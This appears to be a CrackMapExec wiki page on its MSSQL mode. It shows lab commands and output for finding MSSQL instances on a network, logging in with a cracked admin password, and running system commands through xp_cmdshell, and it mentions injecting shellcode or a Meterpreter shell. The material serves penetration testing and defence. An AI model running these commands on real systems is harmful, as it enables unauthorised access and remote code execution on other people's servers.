-
Notifications
You must be signed in to change notification settings - Fork 1.6k
MSSQL Mode
#MSSQL Mode
As of CME version 2.3, you're now able to discover, authenticate and execute queries through TCP enabled MSSQL Databases!
Additionally, if the account you're authenticating as has enough privileges, you can execute commands on the system by using xp_cmdshell !
The --mssql
option, switches CME into MSSQL Mode : any additional option you now provide will be executed and/or enumerated through the MSSQL DB!
In this example, we enumerate all availabe TCP Enabled MSSQL DBs on the network:
#~ python crackmapexec.py 192.168.0.0/24 --mssql
03-12-2016 18:56:42 SMB 192.168.0.103:445 DC1 [*] Windows 6.3 Build 9600 (name:DC1) (domain:LAB)
03-12-2016 18:56:42 SMB 192.168.0.104:445 WIN10BOX [*] Windows 10.0 Build 10586 (name:WIN10BOX) (domain:LAB)
03-12-2016 18:56:45 SMB 192.168.0.106:445 WIN7BOX [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX [*] Found 1 MSSQL instance(s)
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX Instance 0
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX ServerName:WIN7BOX
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX tcp:1433
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX IsClustered:No
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX Version:12.0.2000.8
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX np:\\WIN7BOX\pipe\MSSQL$SQLEXPRESS\sql\query
03-12-2016 18:56:45 MSSQL 192.168.0.106:1433 WIN7BOX InstanceName:SQLEXPRESS
HA! As we can see from the output there's an MSSQL DB ripe for the pilfering available on 192.168.0.106!
Lets say after using Responder we manage to only get a SQL Admin account hash which we are able to crack. This account has very limited access on machines but has Administrative access over MSSQL DBs.
Have no fear! CME is here!
The following example shows CME executing the whoami
command by using xp_cmdshell:
#~ python crackmapexec.py 192.168.0.0/24 --mssql -u SQLAdmin -p password -x 'whoami'
03-12-2016 19:11:49 SMB 192.168.0.103:445 DC1 [*] Windows 6.3 Build 9600 (name:DC1) (domain:WIN7BOX)
03-12-2016 19:11:49 SMB 192.168.0.104:445 WIN10BOX [*] Windows 10.0 Build 10586 (name:WIN10BOX) (domain:WIN7BOX)
03-12-2016 19:11:52 SMB 192.168.0.106:445 WIN7BOX [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:WIN7BOX)
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX [*] Found 1 MSSQL instance(s)
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX Instance 0
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX ServerName:WIN7BOX
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX tcp:1433
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX IsClustered:No
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX Version:12.0.2000.8
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX np:\\WIN7BOX\pipe\MSSQL$SQLEXPRESS\sql\query
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX InstanceName:SQLEXPRESS
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX [+] Login successful LAB\SQLAdmin:password
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX [+] Executed command via XP_CMDSHELL
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX output
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX --------------------------------------------------------------------------------
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX nt service\mssql$sqlexpress
03-12-2016 19:11:52 MSSQL 192.168.0.106:1433 WIN7BOX NULL
We can then use the --inject
option to execute shellcode or get a Meterpreter shell always through the MSSQL DB!